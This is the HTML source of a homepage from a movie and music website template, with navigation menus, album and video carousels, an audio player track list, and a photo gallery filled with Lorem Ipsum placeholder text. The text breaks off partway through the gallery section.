<!DOCTYPE html>
<html lang="en">

<head>
    <!--- Basic Page Needs  -->
    <meta charset="utf-8">
    <title>Home Three || Movie</title>
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="keywords" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Mobile Specific Meta  -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <!-- CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/jquery-ui.css">
    <link rel="stylesheet" href="css/fontawesome-all.min.css">
    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/plyr.css">
    <link rel="stylesheet" href="css/magnific-popup.css">
    <link rel="stylesheet" href="css/slicknav.min.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/responsive.css">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/png" href="img/favicon.ico">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
</head>

<body class="home-3">
    <div id="preloader"></div>
    <!-- header-start -->
    <header class="h3-header">
        <div class="header-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-2 col-md-3 col-sm-12 col-12">
                        <div class="logo">
                            <a href="03_index-3.html">
                                <img src="img/home3/logo.png" alt="">
                            </a>
                        </div>
                    </div>
                    <div class="col-lg-8 col-md-7 col-sm-12 col-12">
                        <div class="responsive-menu d-lg-none"></div>
                        <div class="menu d-none d-lg-block">
                            <nav>
                                <ul id="menu">
                                    <li>
                                        <a href="index.html">Home</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="index.html">Home One</a>
                                            </li>
                                            <li>
                                                <a href="02_index-2.html">Home Two</a>
                                            </li>
                                            <li>
                                                <a href="03_index-3.html">Home Three</a>
                                                <ul class="third">
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="09_about.html">About</a>
                                    </li>
                                    <li>
                                        <a href="05_feature-movie-grid.html">Movie Layout</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="05_feature-movie-grid.html">Movie Grid</a>
                                            </li>
                                            <li>
                                                <a href="06_feature-movie-list.html">Movie list</a>
                                            </li>
                                            <li>
                                                <a href="04_movie-details.html">Movie Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="10_blog-page.html">Blog</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="10_blog-page.html">Blog</a>
                                            </li>
                                            <li>
                                                <a href="11_blog-details.html">Blog Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li class="mega">
                                        <a href="#">Pages</a>
                                        <ul class="mega-menu">
                                            <li>
                                                <a href="#">Column 1</a>
                                                <ul>
                                                    <li>
                                                        <a href="index.html">Home One</a>
                                                    </li>
                                                    <li>
                                                        <a href="02_index-2.html">Home Two</a>
                                                    </li>
                                                    <li>
                                                        <a href="03_index-3.html">Home Three</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 2</a>
                                                <ul>
                                                    <li>
                                                        <a href="04_movie-details.html">Movie Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="05_feature-movie-grid.html">Movie Feature Grid</a>
                                                    </li>
                                                    <li>
                                                        <a href="06_feature-movie-list.html">Movie Feature List</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 3</a>
                                                <ul>
                                                    <li>
                                                        <a href="07_celebrety-page.html">Celebrety Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="08_celebrety-details.html">Celebrety Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="09_about.html">About</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 4</a>
                                                <ul>
                                                    <li>
                                                        <a href="10_blog-page.html">Blog Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="11_blog-details.html">Blog Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="12_contact.html">Contact</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="12_contact.html">Contacts</a>
                                    </li>
                                </ul>
                            </nav>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-2 col-sm-12 col-12">
                        <div class="top-search-cart">
                            <div class="tsc-search">
                                <span data-toggle="modal" data-target="#search_modal">
                                    <i class="fa fa-search"></i>
                                </span>
                                <!-- search-modal-start -->
                                <div id="search_modal" class="search-modal modal fade" tabindex="-1" role="dialog" aria-hidden="true">
                                    <div class="modal-dialog">
                                        <!-- Modal content-->
                                        <div class="modal-content">
                                            <h4 class="modal-title">Type and Press Enter</h4>
                                            <form action="#">
                                                <input type="text" placeholder="Search Here">
                                            </form>
                                            <div class="modal-close">
                                                <button type="button" data-dismiss="modal">Close</button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <!-- search-modal-end -->
                            </div>
                            <div class="tsc-cart">
                                <a class="link" href="#">
                                    <i class="fas fa-shopping-basket"></i>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- header-start -->
    <!-- slider-area-start -->
    <div class="h3-slider-area h3-slider-carousel owl-carousel">
        <div class="h3-slider-box">
            <div class="img">
                <img src="img/home3/slider-1.jpg" alt="">
            </div>
            <div class="content d-none d-sm-block">
                <div class="h3-sb-content-box">
                    <h3 class="intro animated">Welcome to</h3>
                    <h2 class="title animated">our Music Town</h2>
                    <p class="text animated d-none d-md-block">The standard chunk of Lorem Ipsum used since the 1500s is that reproduced below for those interested.</p>
                    <div class="buttons">
                        <a class="button hvr-bs animated" href="#">Read More</a>
                    </div>
                </div>
            </div>
        </div>
        <div class="h3-slider-box">
            <div class="img">
                <img src="img/home3/slider-2.jpg" alt="">
            </div>
            <div class="content d-none d-sm-block">
                <div class="h3-sb-content-box">
                    <h3 class="intro animated">Welcome to</h3>
                    <h2 class="title animated">our Music Town</h2>
                    <p class="text animated d-none d-md-block">The standard chunk of Lorem Ipsum used since the 1500s is that reproduced below for those interested.</p>
                    <div class="buttons">
                        <a class="button hvr-bs animated" href="#">Read More</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- slider-area-end -->
    <!-- about-movie-area-start -->
    <div class="h3-about-movie-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>About This Movie</h2>
                    </div>
                </div>
            </div>
            <div class="h2-single-about-movie single-about-movie">
                <div class="row">
                    <div class="col-lg-6 col-md-6 col-sm-12 col-12">
                        <div class="banner">
                            <img src="img/home3/about-banner.jpg" alt="">
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-6 col-sm-12 col-12">
                        <div class="content">
                            <h3 class="intro">About Us</h3>
                            <h2 class="title">Onupoma Chircut</h2>
                            <p class="text">Lorem the industry's standard dummy text ever since the 1500s, when an unknown printer took a
                                galley of type and scrambled it to make a type specimen book. It has survived not only five
                                centuries, but also the leap into electronic.an unknown printer took a galley of type and
                                scrambled
                                <br>
                                <br> galley of type and scrambled it to make a type specimen book. It has survived not only five
                                centuries, but also the leap into electronic.an unknown printer took a galley of type and
                            </p>
                            <div class="author">
                                <div class="img">
                                    <img src="img/home3/about-author.png" alt="">
                                </div>
                                <div class="sign">
                                    <img src="img/home3/about-author-sign.png" alt="">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- about-movie-area-end -->
    <!-- all-album-area-start -->
    <div class="all-album-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>All Albums</h2>
                    </div>
                </div>
            </div>
            <div class="all-album-carousel owl-carousel">
                <div class="h3-single-album single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home3/album-1.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Angry Man 6</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="h3-single-album single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home3/album-2.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Darkness World</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="h3-single-album single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home3/album-3.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">World War 5</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="h3-single-album single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home3/album-4.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Nature Beauty 2</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
                <div class="h3-single-album single-top-movie">
                    <div class="img">
                        <a href="04_movie-details.html">
                            <img src="img/home3/album-2.jpg" alt="">
                        </a>
                    </div>
                    <span class="view-counter">263k Views</span>
                    <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                        <i class="far fa-play-circle"></i>
                    </a>
                    <div class="content">
                        <h2 class="name">
                            <a href="04_movie-details.html">Angry Man 6</a>
                        </h2>
                        <div class="rating clearfix">
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-on"></div>
                            <div class="star star-half"></div>
                        </div>
                        <p class="date">October 26, 2018</p>
                        <p class="duration">02 :50 :12</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- all-album-area-end -->
    <!-- show-video-area-start -->
    <div class="show-video-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>My Show Videos</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-7 col-md-12 col-sm-12 col-12">
                    <div class="upcoming-movie-feature">
                        <div class="single-show-vide-big umf-single single-top-movie">
                            <div class="img">
                                <a href="04_movie-details.html">
                                    <img src="img/home3/mshow-b-1.jpg" alt="">
                                </a>
                            </div>
                            <span class="view-counter">759k Views</span>
                            <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                <i class="far fa-play-circle"></i>
                            </a>
                            <div class="content">
                                <h2 class="name">
                                    <a href="04_movie-details.html">Concert Place University New South Wales Sydney NSW 2052, Aust</a>
                                </h2>
                                <div class="rating clearfix">
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-on"></div>
                                    <div class="star star-half"></div>
                                </div>
                                <p class="date">October 26, 2018</p>
                                <p class="duration">02 :50 :12</p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-5 col-md-12 col-sm-12 col-12">
                    <div class="upcoming-movie-small ums-carousel owl-carousel">
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="h3-single-album ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home3/mshow-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">University of Sydney</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="h3-single-album ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home3/mshow-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">University of Sydney</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="h3-single-album ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home3/mshow-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">University of Sydney</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="h3-single-album ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home3/mshow-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">University of Sydney</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Sport Life</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Love War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fire Sermon</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fish Warehouse</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="ums-all">
                            <div class="row">
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-1.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Sport Life</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Love War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-6 col-12">
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fire Sermon</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                    <div class="ums-single single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/upcoming-s-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">125k Views</span>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Fish Warehouse</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- show-video-area-end -->
    <!-- my-album-area-start -->
    <div class="my-album-area">
        <div class="my-album-bg2"></div>
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>My Albums</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-4 offset-lg-0 col-md-6 offset-md-3 col-sm-8 offset-sm-2 col-12">
                    <div id="player-one" class="player-main-block">
                        <div class="album-art-block">
                            <div class="track-meta-info" id="meta-container">
                                <span class="song-name" amplitude-song-info="name" amplitude-main-song-info="true"></span>
                                <div class="song-artist-album">
                                    -
                                    <span amplitude-song-info="artist" amplitude-main-song-info="true"></span>
                                </div>
                            </div>
                            <div class="album-art-space">
                                <img class="img-responsive" amplitude-song-info="cover_art_url" amplitude-main-song-info="true" alt="..." />
                            </div>
                        </div>
                        <div id="amplitude-left" class="audio-controller-wrap">
                            <div id="player-left-bottom">

                                <div class="time-controller-block" id="time-container">
                                    <div class="input-range-block">
                                        <span class="current-time">
                                            <span class="amplitude-current-minutes" amplitude-main-current-minutes="true"></span>:
                                            <span class="amplitude-current-seconds" amplitude-main-current-seconds="true"></span>
                                        </span>
                                        <div class="track-progress-wrap">
                                            <input type="range" class="amplitude-song-slider full-width" min="1" max="100" step="1" amplitude-main-song-slider="true"
                                            />
                                            <div class="track-progress"></div>
                                        </div>
                                        <span class="duration">
                                            <span class="amplitude-duration-minutes" amplitude-main-duration-minutes="true"></span>:
                                            <span class="amplitude-duration-seconds" amplitude-main-duration-seconds="true"></span>
                                        </span>
                                    </div>
                                </div>
                                <div id="control-container" class="control-container">
                                    <div id="central-control-container">
                                        <div id="central-controls" class="audio-controller-block">
                                            <div class="controller-common amplitude-prev" id="previous"></div>
                                            <div class="controller-common amplitude-play-pause play-pause-btn" amplitude-main-play-pause="true" id="play-pause"></div>
                                            <div class="controller-common amplitude-next" id="next"></div>
                                        </div>
                                    </div>
                                </div>
                                <div class="player-footer">
                                    <div class="volume-container">
                                        <i class="fa fa-volume-down" aria-hidden="true"></i>
                                        <input type="range" class="amplitude-volume-slider volume-slider-one" />
                                        <i class="fa fa-volume-up" aria-hidden="true"></i>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-7 offset-lg-1 col-md-12 col-sm-12 col-12">
                    <div class="player-track-list-block">
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="0" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/1.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">One Dance</span>
                                <span class="song-artist">DRAKE FT WIZKID &amp; KYLA</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="1" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/2.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">7 YEARS</span>
                                <span class="song-artist">LUKAS GRAHAM</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="2" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/3.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">CHEAP THRILLS</span>
                                <span class="song-artist">SIA</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="3" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/4.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">I TOOK A PILL IN IBIZA</span>
                                <span class="song-artist">MIKE POSNER</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="4" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/5.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">THIS IS WHAT YOU CAME FOR</span>
                                <span class="song-artist">CALVIN HARRIS FT RIHANNA</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="5" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/6.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">LUSH LIFE</span>
                                <span class="song-artist">ZARA LARSSON</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="6" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/7.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">CLOSER</span>
                                <span class="song-artist">CHAINSMOKERS FT HALSEY</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="7" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/8.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">LOVE YOURSELF</span>
                                <span class="song-artist">JUSTIN BIEBER</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="8" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/9.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">WORK</span>
                                <span class="song-artist">RIHANNA FT DRAKE</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                        <div class="song amplitude-song-container amplitude-play-pause" amplitude-song-index="9" data-song="audio/interlude.mp3"
                            data-cover="img/album-art/10.jpg">
                            <div class="song-meta-data">
                                <span class="song-title">CAN'T STOP THE FEELING</span>
                                <span class="song-artist">JUSTIN TIMBERLAKE</span>
                            </div>
                            <div class="play-now">
                                <a class="btn btn-sm btn-black">
                                    <span class="normal-state">Play Now</span>
                                    <span class="play-state">Pause</span>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- my-album-area-end -->
    <!-- my-gallery-area-start -->
    <div class="my-gallery-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>My Gallery</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-1.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-2.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-3.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-4.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
                            <h2 class="name">Jec Jisom Kalam</h2>
                        </div>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6 col-sm-6 col-12">
                    <div class="single-gallery">
                        <div class="img">
                            <img src="img/home3/gallery-5.jpg" alt="">
                        </div>
                        <div class="content">
                            <a class="link" href="#" target="_blank">
                                <i class="fas fa-link"></i>
                            </a>
